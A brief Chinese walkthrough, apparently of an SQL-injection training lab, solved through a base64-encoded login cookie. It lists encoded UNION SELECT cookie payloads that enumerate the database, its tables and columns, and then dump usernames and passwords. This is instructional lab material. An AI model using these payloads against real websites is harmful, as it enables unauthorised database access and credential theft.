登录成功后,burpsuite抓包,发现cookie是加了密:
在burpsuite上解密是admin:
那么接下来的操作的payload都应该经过base64加密后再注入
判断是单引号单括号注入类型:
Cookie: uname=YWEnKSM=
爆库:
Cookie: uname=JyApIHVuaW9uIHNlbGVjdCAxLDIsZGF0YWJhc2UoKSM=
爆表:
Cookie: uname=JykgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQodGFibGVfbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEudGFibGVzIHdoZXJlIHRhYmxlX3NjaGVtYT0nc2VjdXJpdHknIw==
爆列:
Cookie: uname=JykgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfbmFtZT0ndXNlcnMnIw==
爆数据:
Cookie: uname=JykgdW5pb24gc2VsZWN0IDEsMixncm91cF9jb25jYXQodXNlcm5hbWUscGFzc3dvcmQpIGZyb20gdXNlcnMj